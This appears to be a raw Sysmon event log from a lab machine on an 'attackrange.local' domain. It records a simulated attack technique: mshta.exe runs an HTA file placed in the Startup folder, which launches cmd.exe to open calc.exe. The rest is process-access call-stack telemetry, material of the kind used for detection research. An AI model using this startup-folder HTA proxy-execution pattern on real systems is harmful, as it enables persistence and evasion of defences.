15:16:37.064{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789879Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.064{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789878Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.064{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789877Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.064{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789876Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.064{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789875Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.064{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789874Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.064{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789873Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.064{732C744F-151A-600B-1600-00000000A301}15281680C:\Windows\system32\svchost.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789872Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.064{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789871Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.048{732C744F-3255-6010-D2A2-00000000A301}49807208C:\Windows\system32\conhost.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789870Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.048{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15eb9|C:\Windows\System32\SHELL32.dll+b07e0|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789869Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.048{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789868Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.048{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789867Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.048{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789866Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.048{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789865Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.048{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789864Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.048{732C744F-17DF-600B-9401-00000000A301}50844476C:\Windows\system32\csrss.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000789863Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.033{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789862Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.033{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789861Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.033{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789860Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.033{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789859Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.033{732C744F-17DF-600B-9401-00000000A301}50844476C:\Windows\system32\csrss.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000789858Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.033{732C744F-3254-6010-D0A2-00000000A301}12326660C:\Windows\system32\mshta.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000789857Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.042{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c calc.exeC:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\System32\mshta.exe"C:\Windows\system32\mshta.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta" 22542200x8000000000000000790084Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.881{00000000-0000-0000-0000-000000000000}5424raw.githubusercontent.com0type: 5 github.map.fastly.net;::ffff:151.101.52.133;<unknown process> 10341000x8000000000000000790083Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790082Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790081Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790080Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790079Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790078Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790077Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790076Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790075Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790074Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790073Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 